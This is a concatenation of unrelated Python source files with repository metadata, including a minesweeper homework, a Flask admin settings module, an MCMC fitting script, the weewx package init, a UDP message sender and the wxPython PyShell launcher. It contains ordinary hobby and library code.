s (int): širina polja
v (int): višina polja.
"""
########################
# Za oceno 9
#
# Vse funkcije za oceno 6 in 7 morajo biti napisane v eni vrstici.
########################
# Za oceno 10
def preberi_pot(ukazi):
"""
Za podani seznam ukazov (glej navodila naloge) vrni pot.
Args:
ukazi (str): ukazi, napisani po vrsticah
Returns:
list of tuple of int: pot
"""
def zapisi_pot(pot):
"""
Za podano pot vrni seznam ukazov (glej navodila naloge).
Args:
pot (list of tuple of int): pot
Returns:
str: ukazi, napisani po vrsticah
"""
def sosedov(x, y, mine):
stevec=0
for x1, y1 in mine:
if ((x1 + 1) == x) and y1 == y:
stevec = stevec + 1
if ((x1 - 1) == x) and y1 == y:
stevec = stevec + 1
if (((x1 + 1) == x) and (y1 + 1 == y)):
stevec = stevec + 1
if (((x1 - 1) == x) and (y1 + 1 == y)):
stevec = stevec + 1
if ((x1 == x) and (y1 + 1 == y)):
stevec = stevec + 1
if (((x1 + 1) == x) and (y1 - 1 == y)):
stevec = stevec + 1
if (((x1 - 1) == x) and (y1 - 1 == y)):
stevec = stevec + 1
if ((x1 == x) and (y1 - 1 == y)):
stevec = stevec + 1
return stevec
def najvec_sosedov(mine, s, v):
največ_min=0
maskimum_koordinate=0,0
for x,y in vsa_polja(s,v):
vsota_min=sosedov(x,y,mine)
if vsota_min>največ_min:
največ_min=vsota_min
maskimum_koordinate=x,y
return maskimum_koordinate
def brez_sosedov(mine, s, v):
seznam_koordinat=set()
koordinate_brez_min=0,0
for x,y in vsa_polja(s,v):
brez_min=sosedov(x,y,mine)
if brez_min==0:
koordinate_brez_min=x,y
seznam_koordinat.add(koordinate_brez_min)
return seznam_koordinat
def po_sosedih(mine, s, v):
slovar_sosedi={}
i=0
while i <= 8:
seznam_koordinat = set()
for x, y in vsa_polja(s, v):
brez_min = sosedov(x, y, mine)
if brez_min == i:
seznam_koordinat.add((x,y))
slovar_sosedi[i]=seznam_koordinat
i=i+1
return slovar_sosedi
def dolzina_poti(pot):
dolzina = 0
razdalja2 = 0
razdalja1 = 0
for x, y in pot:
x1 = x
y1 = y
break
for x, y in pot:
razdalja1 = y - y1
if razdalja1 < 0:
razdalja1 = razdalja1 + 2 * (-razdalja1)
dolzina = dolzina + razdalja1
razdalja2 = x - x1
if razdalja2 < 0:
razdalja2 = razdalja2 + 2 * (-razdalja2)
dolzina = dolzina + razdalja2
x1 = x
y1 = y
return (dolzina)
def varen_premik(x0, y0, x1, y1, mine):
for a, b in mine:
if (x0 <= a <= x1 or x1 <= a <= x0) and (y0 <= b <= y1 or y1 <= b <= y0):
return False
return True
def varna_pot(pot, mine):
for x0, y0 in pot:
for a, b in mine:
if x0 == a and y0 == b:
return False
for (x0, y0), (x1, y1) in zip(pot, pot[1:]):
for a, b in mine:
if (x0 <= a <= x1 or x1 <= a <= x0) and (y0 <= b <= y1 or y1 <= b <= y0):
return False
return True
def polje_v_mine(polje):
sirina=len(polje.split()[0])
visina=len(polje.split())
x = 0
y = 0
stevec_y = 1
mnozica_min=set()
for p in polje:
if p == ".":
x = x + 1
if p == " ":
y = y + 1
x = 0
if p == "X":
mina = x, y
x = x + 1
mnozica_min.add(mina)
return (mnozica_min,sirina,visina)
|
[
"[email protected]"
] | |
a63c062cdb9013fbce1c5eaec2a18d8d71f46f16
|
220dd5d666b85b716d5762097fb2d320bb8587fd
|
/test/int/kth_largest.py
|
0deb333531b86715608b4220b28bf4dfb7edd0fa
|
[] |
no_license
|
bensenberner/ctci
|
011946a335396def198acaa596d2b5902af7b993
|
1e1ba64580ee96392c92aa95904c4751e32d4e30
|
refs/heads/master
| 2021-01-10T14:09:01.698323 | 2020-09-06T04:17:53 | 2020-09-06T04:17:53 | 45,659,115 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 345 |
py
|
import unittest
from int.kth_largest import kth_largest
class Test(unittest.TestCase):
def test(self):
arr = [7, 5, 2, 7, 1, 8, 3]
self.assertEqual(5, kth_largest(arr, 4))
def test_simple(self):
arr = [3, 2, 1]
self.assertEqual(3, kth_largest(arr, 1))
self.assertEqual(2, kth_largest(arr, 2))
|
[
"[email protected]"
] | |
9c9fec3a233bcb7fb1af897298b1c336ccdc7b53
|
f6c103bd11b6a7fe92a2fc48562a06c87a60ac51
|
/lard/data.py
|
e20f63ae7dd15b080427aa653f9a03ea5b66aa0e
|
[] |
no_license
|
brettviren/lard
|
d17405ab2df1e8f8ef22a2706f0dcad3fe5b06e7
|
429d71c9912b62f47d18e25c5063eb66d36f6d93
|
refs/heads/master
| 2021-01-10T14:21:59.327286 | 2015-05-25T02:59:01 | 2015-05-25T02:59:01 | 36,177,192 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,255 |
py
|
#!/usr/bin/env python
'''The lard data model.
The objects in this module make up an internal, transient data schema.
Modules under lard.adapters produce this data model and modules under
lard.renderers accept it to produce some end form.
'''
from collections import namedtuple
ScalarPoint = namedtuple('ScalarPoint', 'x y z s')
def CastScalarPoint(d):
if type(d) == dict:
return ScalarPoint(float(d['x']),float(d['y']),float(d['z']),float(d['s']))
if type(d) == tuple or type(d) == list:
return ScalarPoint(float(d[0]),float(d[1]),float(d[2]),float(d[3]))
return ScalarPoint(float(d.x),float(d.y),float(d.z),float(d.s))
#from schema import Schema, Use, Optional
from voluptuous import Schema, Optional
# schema v1 is a pair of lists of scalar point values, for simulation "truth" and reconstructed.
schema_v1 = Schema(
{
Optional('truth'): [CastScalarPoint],
Optional('recon'): [CastScalarPoint],
}
)
# Most recent version
schema = schema_v1
def validate(data, version=None):
'Validate data against schema'
if version is None:
return schema(data)
if version == 'v1' or version == 1:
return schema_v1(data)
return version(data) # assume version is a Schema object
|
[
"[email protected]"
] | |
3af9d7000fa029acf9ab00357f727462d5bb3e49
|
0be8bd02d3b93d89eba2174313c1599e1993589d
|
/businessmanager/app/operational/admin/frontend.py
|
c0a79f0155dabc50606f5b86b05001324769593a
|
[
"MIT"
] |
permissive
|
Mr82/marketplace
|
ac1b5e83dbd759965b4ea2d244b80987da747794
|
edc55e3e622656a6b6e72ecc1b88b900e05994f3
|
refs/heads/master
| 2022-12-11T12:32:02.463053 | 2020-09-18T09:14:44 | 2020-09-18T09:14:44 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,618 |
py
|
from datetime import datetime
from flask import Blueprint, render_template, redirect, url_for, flash, abort, request
from flask_login import login_required, current_user
import commonmark
from app import db
from app.decorators import admin_required
from app.models import EditableHTML, Role, User, Organisation, Message, ContactMessage, LandingSetting, LandingImage, OurBrand
from app.operational.admin.views import admin
from wtforms import Flags
from .forms import (
LandingSettingForm,
LandingImageForm,
OurBrandForm
)
from flask_uploads import UploadSet, IMAGES
from flask_wtf.file import FileAllowed
images = UploadSet('images', IMAGES)
photos = UploadSet('photos', IMAGES)
@admin.route('/settings/dashboard/')
@login_required
@admin_required
def frontend_dashboard():
"""Frontend dashboard page."""
return render_template('admin/frontend_settings_dashboard.html')
@admin.route('/landing-settings', methods=['GET', 'POST'])
@admin.route('/edit/<int:id>', methods=['GET', 'POST'])
@login_required
@admin_required
def landing_setting(id=None):
"""Adds information to the landing page."""
settings = db.session.query(LandingSetting.id).count()
if settings == 1:
return redirect(url_for('admin.edit_landing_setting', id=1))
form = LandingSettingForm()
if request.method == 'POST':
settings = LandingSetting(
site_name = form.site_name.data,
title = form.title.data,
description = form.description.data,
twitter_name = form.twitter_name.data,
facebook_name = form.facebook_name.data,
instagram_name=form.instagram_name.data,
linkedin_name = form.linkedin_name.data,
tiktok_name = form.tiktok_name.data,
snap_chat_name = form.snap_chat_name.data,
youtube = form.youtube.data,
blog = form.blog.data,
about = form.about.data,
contact = form.contact.data,
faq = form.faq.data,
featured_title_one = form.featured_title_one.data,
featured_title_one_text = form.featured_title_one_text.data,
featured_title_one_icon = form.featured_title_one_icon.data,
featured_title_two = form.featured_title_two.data,
featured_title_two_text = form.featured_title_two_text.data,
featured_title_two_icon = form.featured_title_two_icon.data,
featured_title_three = form.featured_title_three.data,
featured_title_three_text = form.featured_title_three_text.data,
featured_title_three_icon = form.featured_title_three_icon.data,
google_analytics_id = form.google_analytics_id.data,
other_tracking_analytics_one = form.other_tracking_analytics_one.data,
other_tracking_analytics_two = form.other_tracking_analytics_two.data,
block_content_one = form.block_content_one.data
)
db.session.add(settings)
db.session.commit()
flash('Settings successfully added', 'success')
return redirect(url_for('admin.edit_landing_setting', id=id))
return render_template('admin/new_landing_setting.html', form=form)
@admin.route('/edit-landing-settings/<int:id>', methods=['GET', 'POST'])
@login_required
@admin_required
def edit_landing_setting(id):
"""Edit information to the landing page."""
settings = LandingSetting.query.get(id)
form = LandingSettingForm(obj=settings)
if request.method == 'POST':
form.populate_obj(settings)
db.session.add(settings)
db.session.commit()
flash('Settings successfully edited', 'success')
return redirect(url_for('admin.frontend_dashboard'))
return render_template('admin/edit_landing_setting.html', form=form)
@admin.route('/upload', methods=['GET', 'POST'])
def upload():
form = LandingImageForm()
if request.method == 'POST' and 'image' in request.files:
image = images.save(request.files['image'])
image = LandingImage(image=image)
db.session.add(image)
db.session.commit()
flash("Photo saved.")
return redirect(url_for('admin.show', id=image.id))
return render_template('admin/upload.html', form=form)
@admin.route('/image/<int:id>')
def show(id):
photo = LandingImage.query.get(id)
if photo is None:
abort(404)
url = images.url(photo.image)
return render_template('admin/show.html', url=url, photo=photo)
@admin.route('/landing-brand-settings', methods=['GET', 'POST'])
@admin.route('/landing-brand-settings/edit/<int:id>', methods=['GET', 'POST'])
@login_required
@admin_required
def landing_brand_setting(id=None):
"""Adds information to the landing page."""
settings = db.session.query(OurBrand.id).count()
if settings == 1:
return redirect(url_for('admin.edit_landing_brand_setting', id=1))
form = OurBrandForm()
if request.method == 'POST':
settings = OurBrand(
brand_name_one = form.brand_name_one.data,
brand_name_two = form.brand_name_two.data,
brand_name_three = form.brand_name_three.data,
brand_name_five = form.brand_name_five.data,
brand_url_one = form.brand_url_five.data,
brand_url_two = form.brand_url_five.data,
brand_url_three = form.brand_url_five.data,
brand_url_four = form.brand_url_five.data,
brand_url_five = form.brand_url_five.data
)
db.session.add(settings)
db.session.commit()
flash('Settings successfully added', 'success')
return redirect(url_for('admin.edit_landing_brand_setting', id=id))
return render_template('admin/new_landing_brand_setting.html', form=form)
@admin.route('/edit-landing-brand-settings/<int:id>', methods=['GET', 'POST'])
@login_required
@admin_required
def edit_landing_brand_setting(id):
"""Edit information to the landing page."""
settings = OurBrand.query.get(id)
form = OurBrandForm(obj=settings)
if request.method == 'POST':
form.populate_obj(settings)
db.session.add(settings)
db.session.commit()
flash('Settings successfully edited', 'success')
return redirect(url_for('admin.frontend_dashboard'))
return render_template('admin/new_landing_brand_setting.html', form=form)
@admin.route('/landing-news-settings', methods=['GET', 'POST'])
@admin.route('/landing-news-settings/edit/<int:id>', methods=['GET', 'POST'])
@login_required
@admin_required
def landing_news_setting(id=None):
"""Adds information to the landing page."""
settings = db.session.query(NewsLink.id).count()
if settings == 1:
return redirect(url_for('admin.edit_landing_brand_setting', id=1))
form = NewsLinkForm()
if request.method == 'POST':
settings = NewsLink(
news_site_one = form.news_site_one.data,
news_site_two = form.news_site_two.data,
news_site_three = form.news_site_three.data,
news_site_five = form.news_site_five.data,
news_url_one = form.news_url_five.data,
news_url_two = form.news_url_five.data,
news_url_three = form.news_url_five.data,
news_url_four = form.news_url_five.data,
news_url_five = form.news_url_five.data
)
db.session.add(settings)
db.session.commit()
flash('Settings successfully added', 'success')
return redirect(url_for('admin.edit_landing_brand_setting', id=id))
return render_template('admin/new_landing_edit_setting.html', form=form)
# BUG FIX: this view previously registered the rule
# '/edit-landing-brand-settings/<int:id>' -- identical to
# edit_landing_brand_setting's rule -- so Flask always dispatched to the
# earlier-registered brand view and this one was unreachable.
@admin.route('/edit-landing-news-settings/<int:id>', methods=['GET', 'POST'])
@login_required
@admin_required
def edit_landing_news_setting(id):
    """Edit the news-links block shown on the landing page."""
    settings = NewsLink.query.get(id)
    form = NewsLinkForm(obj=settings)
    if request.method == 'POST':
        form.populate_obj(settings)
        db.session.add(settings)
        db.session.commit()
        flash('Settings successfully edited', 'success')
        return redirect(url_for('admin.frontend_dashboard'))
    return render_template('admin/new_landing_edit_setting.html', form=form)
|
[
"[email protected]"
] | |
8a65e97c3ab254c2ee98390b1357635b7e212d35
|
d768f07ed90c0274e2d9d935eaf5ecfe734a1f56
|
/fit_mcmc_ps.py
|
2f483e28f42d7cbdab267fa0e28c4998c1cd56ba
|
[] |
no_license
|
bvillasen/simulation_analysis
|
cfd0b5de865d2fb5992d828b2824079e6798774b
|
645f0c397172ed30a713368942eec9ca68a9761a
|
refs/heads/master
| 2023-06-02T19:06:39.851760 | 2021-06-25T18:40:58 | 2021-06-25T18:40:58 | 298,894,454 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,117 |
py
|
import os, sys
import numpy as np
import pickle
import matplotlib.pyplot as plt
sys.path.append('tools')
from tools import *
#Append analysis directories to path
extend_path()
from parameters_UVB_rates import param_UVB_Rates
from simulation_grid import Simulation_Grid
from simulation_parameters import *
from mcmc_functions import *
from mcmc_data_functions import *
from data_thermal_history import *
from mcmc_plotting_functions import *
from mcmc_sampling_functions import *
# Observational Lya P(k) data sets to fit against. Other combinations were
# explored and are kept (commented out) for reference.
# data_sets = [ 'Boss', 'Walther', 'Boera', 'Viel' ]
data_ps_sets = [ 'Boss' ]
# data_sets = [ 'Walther' ]
# data_sets = [ 'Boera' ]
# data_sets = [ 'Boss', 'Walther' ]
# data_sets = [ 'Walther', 'Boera' ]
# data_sets = [ 'Walther', 'Viel' ]

# Tag such as 'Boss_Walther' built from the selected data sets; used in the
# output directory name.
name = ''
for data_set in data_ps_sets:
  name += data_set + '_'
name = name[:-1]

field = 'P(k)+'
ps_data_dir = 'lya_statistics/data/'
mcmc_dir = root_dir + 'fit_mcmc/'
create_directory( mcmc_dir )
output_dir = mcmc_dir + f'fit_results_{field}_{name}/'
create_directory( output_dir )

# When True, reuse a previous run's pickled stats/samples instead of
# re-running the sampler.
# load_mcmc_results = False
load_mcmc_results = True

SG = Simulation_Grid( parameters=param_UVB_Rates, sim_params=sim_params, job_params=job_params, dir=root_dir )
SG.Load_Grid_Analysis_Data()
ps_range = SG.Get_Power_Spectrum_Range( kmax=0.01 )
sim_ids = SG.sim_ids

# Redshift window of the fit.
z_min = 2.0
z_max = 5.0
ps_extras = { 'range':ps_range, 'data_dir':ps_data_dir, 'data_sets':data_ps_sets }
comparable_data = Get_Comparable_Composite( field, z_min, z_max, ps_extras=ps_extras )
comparable_grid = Get_Comparable_Composite_from_Grid( field, comparable_data, SG )
# Plot_Comparable_Data( field, comparable_data, comparable_grid, output_dir )

z_vals = [ 2.0, 2.2, 2.4, 2.6, 2.8, 3.0, 3.2, 3.4, 3.6, 3.8, 4.0, 4.2, 4.6, 5.0, ]
data_grid, data_grid_power_spectrum = Get_Data_Grid_Composite( field, SG, z_vals=z_vals )

stats_file = output_dir + 'fit_mcmc.pkl'
samples_file = output_dir + 'samples_mcmc.pkl'

params = SG.parameters
if load_mcmc_results:
  print( f'Loading File: {stats_file}')
  stats = pickle.load( open( stats_file, 'rb' ) )
  param_stats = {}
  # Copy the per-parameter posterior mean / std-dev back onto the grid's
  # parameter dictionary.
  for p_id in params.keys():
    p_name = params[p_id]['name']
    p_stats = stats[p_name]
    params[p_id]['mean'] = p_stats['mean']
    params[p_id]['sigma'] = p_stats['standard deviation']
  print( f'Loading File: {samples_file}')
  param_samples = pickle.load( open( samples_file, 'rb' ) )
else:
  nIter = 200000
  # BUG FIX: `nIter / 5` is a float under Python 3 true division, but pymc's
  # MCMC.sample expects an integer burn-in; use floor division.
  nBurn = nIter // 5
  nThin = 1
  # model, params_mcmc = mcmc_model_3D( comparable_data, comparable_grid, field, 'mean', SG )
  model, params_mcmc = mcmc_model_4D( comparable_data, comparable_grid, field, 'mean', SG )
  MDL = pymc.MCMC( model )
  MDL.sample( iter=nIter, burn=nBurn, thin=nThin )
  stats = MDL.stats()
  param_stats = {}
  for p_id in params.keys():
    p_name = params[p_id]['name']
    p_stats = stats[p_name]
    params[p_id]['mean'] = p_stats['mean']
    params[p_id]['sigma'] = p_stats['standard deviation']
  Plot_MCMC_Stats( stats, MDL, params_mcmc, stats_file, output_dir, plot_corner=False )
  param_samples = Write_MCMC_Results( stats, MDL, params_mcmc, stats_file, samples_file, output_dir )

# Make Corner plot from posteriors
labels = { 'scale_He':r'$\beta_{\mathrm{He}}$', 'scale_H':r'$\beta_{\mathrm{H}}$', 'deltaZ_He':r'$\Delta z_{\mathrm{He}}$', 'deltaZ_H':r'$\Delta z_{\mathrm{H}}$' }
Plot_Corner( param_samples, labels, output_dir )

# Get the Highest_Likelihood parameter values
params_HL = Get_Highest_Likelihood_Params( param_samples, n_bins=100 )

# Highest-posterior-interval mass and number of draws used when sampling the
# derived power-spectrum distribution below.
hpi_sum = 0.95
n_samples = 1000

# Obtain distribution of the power spectrum
samples_ps = Sample_Power_Spectrum_from_Trace( param_samples, data_grid_power_spectrum, SG, hpi_sum=hpi_sum, n_samples=n_samples, params_HL=params_HL )
Plot_Power_Spectrum_Sampling( samples_ps, ps_data_dir, output_dir, scales='large', system=system )
#
# # Obtain distribution of the other fields
# field_list = ['T0']
# samples_fields = Sample_Fields_from_Trace( field_list, param_samples, data_grid, SG, hpi_sum=hpi_sum, n_samples=n_samples, params_HL=params_HL )
# Plot_T0_Sampling( samples_fields['T0'], comparable_data, output_dir, system=system )
|
[
"[email protected]"
] | |
da37392ae50890a6cbecaf0cfad0d4d00faaf40f
|
d6c66cea8c8a91681c2c913f663c2d3ea5d73f0c
|
/0. Introduction/copyspecial/copyspecial.py
|
bfe916fef6a1405d9a91d828836e8660b2a43ad1
|
[] |
no_license
|
drewlinsley/CLPS1950_assignments
|
28cc578cd981b417078a14af0fd362801a805a72
|
10f1df11d8270b0865ad03eb02e36e7b2f010159
|
refs/heads/master
| 2020-03-28T03:51:11.884643 | 2018-09-06T13:14:02 | 2018-09-06T13:14:02 | 147,675,900 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,278 |
py
|
#!/usr/bin/python
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# https://developers.google.com/edu/python/exercises/copy-special
import sys
import re
import os
import shutil
import commands
"""Copy Special exercise
"""
# +++your code here+++
# Write functions and modify main() to call them
def main():
  """Parse --todir/--tozip options, leaving only directories in args.

  NOTE(review): this file is Python 2 (print statements, `commands` module);
  the exercise scaffolding only parses arguments -- the copy/zip work is
  still to be written where marked below.
  """
  # This basic command line argument parsing code is provided.
  # Add code to call your functions below.
  # Make a list of command line arguments, omitting the [0] element
  # which is the script itself.
  args = sys.argv[1:]
  if not args:
    # NOTE(review): trailing semicolon is harmless but stray.
    print "usage: [--todir dir][--tozip zipfile] dir [dir ...]";
    sys.exit(1)
  # todir and tozip are either set from command line
  # or left as the empty string.
  # The args array is left just containing the dirs.
  todir = ''
  if args[0] == '--todir':
    todir = args[1]
    # Consume the flag and its value so args holds only directories.
    del args[0:2]
  tozip = ''
  if args[0] == '--tozip':
    tozip = args[1]
    del args[0:2]
  if len(args) == 0:
    print "error: must specify one or more dirs"
    sys.exit(1)
  # +++your code here+++
  # Call your functions
if __name__ == "__main__":
  main()
|
[
"[email protected]"
] | |
81035d4ccc746d19a13221ac8581635b6ffb7cda
|
ba66da3901361854b9bb621586f1e49ad0121ee0
|
/正式开班/第十三天/网络编程/deepin_test.py
|
9fb856a8503ceb648ae75190f86d2fa1bd0780e4
|
[] |
no_license
|
luobodage/PythonBasis
|
c4739920055afbda03774d90151ab183a83583f8
|
ea65536e759fec221a70d7647ae86120277d5459
|
refs/heads/master
| 2023-05-14T15:51:56.213282 | 2021-05-31T00:57:56 | 2021-05-31T00:57:56 | 322,145,745 | 3 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 300 |
py
|
import socket
def main():
    """Prompt for one message and send it over UDP to the fixed target."""
    target = ('192.168.56.1', 8899)
    sender = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    message = input('请输入您要发送的内容:')
    # Encode as GBK to match the receiving end's expected charset.
    sender.sendto(message.encode('gbk'), target)
    sender.close()
if __name__ == '__main__':
    main()
|
[
"[email protected]"
] | |
17f14936cb5142adcf736ab599ebe5d21785778c
|
6a95112805b64322953429270a305d01fef3faea
|
/dist/weewx-4.6.2/bin/weewx/__init__.py
|
57b8d45778a75f501f7d386c6d2692212d3bb389
|
[
"GPL-1.0-or-later",
"GPL-3.0-only",
"Apache-2.0"
] |
permissive
|
tomdotorg/docker-weewx
|
c6d59dc492a9e53f3bc898f7b9f593717092d72c
|
7085654f455d39b06acc688738fde27e1f78ad1e
|
refs/heads/main
| 2023-06-08T17:57:44.184399 | 2023-01-30T11:21:23 | 2023-01-30T11:21:23 | 54,113,384 | 21 | 16 |
Apache-2.0
| 2022-10-19T23:46:26 | 2016-03-17T11:39:29 |
Dockerfile
|
UTF-8
|
Python
| false | false | 5,375 |
py
|
#
# Copyright (c) 2009-2021 Tom Keffer <[email protected]>
#
# See the file LICENSE.txt for your full rights.
#
"""Package weewx, containing modules specific to the weewx runtime engine."""
from __future__ import absolute_import
import time
__version__="4.6.2"

# Holds the program launch time in unix epoch seconds:
# Useful for calculating 'uptime.'
launchtime_ts = time.time()

# Set to true for extra debug information:
debug = False

# Exit return codes
CMD_ERROR = 2
CONFIG_ERROR = 3
IO_ERROR = 4
DB_ERROR = 5

# Constants used to indicate a unit system:
# NOTE(review): the concrete unit mappings behind these flags are defined
# elsewhere in the weewx package, not in this module.
METRIC = 0x10
METRICWX = 0x11
US = 0x01
# =============================================================================
# Define possible exceptions that could get thrown.
# =============================================================================

class WeeWxIOError(IOError):
    """Base class of exceptions thrown when encountering an input/output error
    with the hardware."""

class WakeupError(WeeWxIOError):
    """Exception thrown when unable to wake up or initially connect with the
    hardware."""

class CRCError(WeeWxIOError):
    """Exception thrown when unable to pass a CRC check."""

class RetriesExceeded(WeeWxIOError):
    """Exception thrown when max retries exceeded."""

class HardwareError(Exception):
    """Exception thrown when an error is detected in the hardware."""

class UnknownArchiveType(HardwareError):
    """Exception thrown after reading an unrecognized archive type."""

class UnsupportedFeature(Exception):
    """Exception thrown when attempting to access a feature that is not
    supported (yet)."""

class ViolatedPrecondition(Exception):
    """Exception thrown when a function is called with violated
    preconditions."""

class StopNow(Exception):
    """Exception thrown to stop the engine."""

class UnknownDatabase(Exception):
    """Exception thrown when attempting to use an unknown database."""

class UnknownDatabaseType(Exception):
    """Exception thrown when attempting to use an unknown database type."""

class UnknownBinding(Exception):
    """Exception thrown when attempting to use an unknown data binding."""

class UnitError(ValueError):
    """Exception thrown when there is a mismatch in unit systems."""

class UnknownType(ValueError):
    """Exception thrown for an unknown observation type"""

class UnknownAggregation(ValueError):
    """Exception thrown for an unknown aggregation type"""

class CannotCalculate(ValueError):
    """Exception raised when a type cannot be calculated."""

# =============================================================================
# Possible event types.
# =============================================================================
# NOTE: these are bare classes that carry no state or behavior; they serve as
# unique event-type identifiers (compare the `event_type` attribute of the
# Event class defined further down in this module).

class STARTUP(object):
    """Event issued when the engine first starts up. Services have been
    loaded."""

class PRE_LOOP(object):
    """Event issued just before the main packet loop is entered. Services
    have been loaded."""

class NEW_LOOP_PACKET(object):
    """Event issued when a new LOOP packet is available. The event contains
    attribute 'packet', which is the new LOOP packet."""

class CHECK_LOOP(object):
    """Event issued in the main loop, right after a new LOOP packet has been
    processed. Generally, it is used to throw an exception, breaking the main
    loop, so the console can be used for other things."""

class END_ARCHIVE_PERIOD(object):
    """Event issued at the end of an archive period."""

class NEW_ARCHIVE_RECORD(object):
    """Event issued when a new archive record is available. The event contains
    attribute 'record', which is the new archive record."""

class POST_LOOP(object):
    """Event issued right after the main loop has been broken. Services hook
    into this to access the console for things other than generating LOOP
    packet."""

# =============================================================================
# Service groups.
# =============================================================================

# All existent service groups and the order in which they should be run:
all_service_groups = ['prep_services', 'data_services', 'process_services', 'xtype_services',
                      'archive_services', 'restful_services', 'report_services']
# =============================================================================
# Class Event
# =============================================================================
class Event(object):
    """A single engine event: a type token plus arbitrary payload attributes."""

    def __init__(self, event_type, **argv):
        self.event_type = event_type
        # Attach every keyword argument as an attribute of the event.
        for key, value in argv.items():
            setattr(self, key, value)

    def __str__(self):
        """Return a string with a reasonable representation of the event."""
        payload = "; ".join("%s: %s" % (attr, value)
                            for attr, value in self.__dict__.items()
                            if attr != "event_type")
        return "Event type: %s | " % self.event_type + payload
def require_weewx_version(module, required_version):
    """Raise UnsupportedFeature unless the running weewx is new enough.

    Args:
        module: the extension/module doing the check; only used in the
            error message.
        required_version: minimum acceptable weewx version string,
            e.g. "4.5.0".
    """
    # distutils.version.StrictVersion was deprecated in Python 3.10 and the
    # whole distutils package was removed in 3.12, so compare the dotted
    # numeric prefixes of the two version strings directly. A non-numeric
    # suffix (e.g. the "b1" in "4.6.0b1") is ignored, which is sufficient
    # to order numbered weewx releases.
    def _as_numbers(version_string):
        parts = []
        for piece in version_string.split('.'):
            digits = ''
            for ch in piece:
                if not ch.isdigit():
                    break
                digits += ch
            if not digits:
                break
            parts.append(int(digits))
        return parts
    current = _as_numbers(__version__)
    required = _as_numbers(required_version)
    # Pad the shorter list with zeros so "4.6" compares equal to "4.6.0".
    width = max(len(current), len(required))
    current += [0] * (width - len(current))
    required += [0] * (width - len(required))
    if current < required:
        raise UnsupportedFeature("%s requires weewx %s or greater, found %s"
                                 % (module, required_version, __version__))
|
[
"[email protected]"
] | |
dceefecc0bbc05158cdf9888075288b412680302
|
a7b175357e1ed29dc8332a950e320e64f5db6703
|
/venv/Lib/site-packages/wx/py/PyShell.py
|
c42152a96a555923eeaae65935079cb89adcf6cc
|
[
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
saleguas/deskOrg
|
f65b8603464dbb0e17363ca8a724c12d45da8116
|
c21d9abf56e1756fa8073ccc3547ec9a85d83e2a
|
refs/heads/master
| 2022-12-13T18:06:33.029636 | 2020-04-05T20:19:56 | 2020-04-05T20:19:56 | 164,255,371 | 3 | 1 |
MIT
| 2022-12-08T01:42:51 | 2019-01-05T22:15:27 |
Python
|
UTF-8
|
Python
| false | false | 2,201 |
py
|
#!/usr/bin/env python
"""PyShell is a python shell application."""
# The next two lines, and the other code below that makes use of
# ``__main__`` and ``original``, serve the purpose of cleaning up the
# main namespace to look as much as possible like the regular Python
# shell environment.
import __main__
# Snapshot of the pristine __main__ namespace taken before anything else is
# imported; main() later deletes every name not in this list so the shell's
# namespace looks like a vanilla interactive interpreter.
original = list(__main__.__dict__.keys())
__author__ = "Patrick K. O'Brien <[email protected]>"
import wx
import os
class App(wx.App):
    """PyShell standalone application."""

    def OnInit(self):
        # wx entry point, called on application start-up: build the shell
        # frame and its persistent configuration.
        import os
        import wx
        from wx import py

        self.SetAppName("pyshell")
        # Platform-specific per-user data directory for this app name;
        # created on first run.
        confDir = wx.StandardPaths.Get().GetUserDataDir()
        if not os.path.exists(confDir):
            os.mkdir(confDir)
        fileName = os.path.join(confDir, 'config')
        # Settings are persisted to <confDir>/config; SetRecordDefaults makes
        # unset keys get written with their default values.
        self.config = wx.FileConfig(localFilename=fileName)
        self.config.SetRecordDefaults(True)

        self.frame = py.shell.ShellFrame(config=self.config, dataDir=confDir)
        self.frame.Show()
        self.SetTopWindow(self.frame)
        # True tells wx that initialization succeeded.
        return True
'''
The main() function needs to handle being imported, such as with the
pyshell script that wxPython installs:
#!/usr/bin/env python
from wx.py.PyShell import main
main()
'''
def main():
    """The main function for the PyShell program."""
    # Cleanup the main namespace, leaving the App class.
    import __main__
    md = __main__.__dict__
    keepers = original
    # NOTE(review): 'keepers' aliases the module-level 'original' list, so
    # the append below mutates it. Harmless for a single invocation, but
    # surprising if main() were ever called twice -- confirm before changing.
    keepers.append('App')
    for key in list(md.keys()):
        if key not in keepers:
            del md[key]
    # Create an application instance.
    app = App(0)
    # Cleanup the main namespace some more.
    if 'App' in md and md['App'] is App:
        del md['App']
    if '__main__' in md and md['__main__'] is __main__:
        del md['__main__']
    # Mimic the contents of the standard Python shell's sys.path.
    import sys
    if sys.path[0]:
        # The interactive interpreter has '' (current directory) in slot 0
        # instead of a script path.
        sys.path[0] = ''
    # Add the application object to the sys module's namespace.
    # This allows a shell user to do:
    # >>> import sys
    # >>> sys.app.whatever
    sys.app = app
    del sys
    # Start the wxPython event loop.
    app.MainLoop()
|
[
"[email protected]"
] | |
406e36bcff2429592f817d0372069bb75415b0aa
|
ba7c4862dfbc9d0469f389c0cdb3fed01f99ebe3
|
/plotting/threeD_round3.py
|
3fb154b6f963dffcfabc6254d6d1fefc940621cf
|
[] |
no_license
|
cmontalvo251/Python
|
293cbdf8832d7637d5c0b31eadd02d3ccf2f2c05
|
2b12ce043ee41e08537cfb62301c6a55d4661e04
|
refs/heads/master
| 2023-06-22T21:50:21.225067 | 2023-06-14T13:42:16 | 2023-06-14T13:42:16 | 229,313,158 | 8 | 3 | null | 2021-07-31T16:01:54 | 2019-12-20T18:03:52 |
Python
|
UTF-8
|
Python
| false | false | 2,738 |
py
|
# Import data
import time
import numpy as np
import plotly.graph_objects as go
def frame_args(duration):
    """Build the plotly animation options dict for the given duration (ms)."""
    frame_opts = {"duration": duration}
    transition_opts = {"duration": duration, "easing": "linear"}
    return {
        "frame": frame_opts,
        "mode": "immediate",
        "fromcurrent": True,
        "transition": transition_opts,
    }
# Generate curve data: a unit circular orbit inclined by gamma = 45 degrees.
t = np.linspace(0, 2*np.pi, 1000)
gamma = 45*np.pi/180.0
xorbit = np.sin(gamma)*np.cos(t)
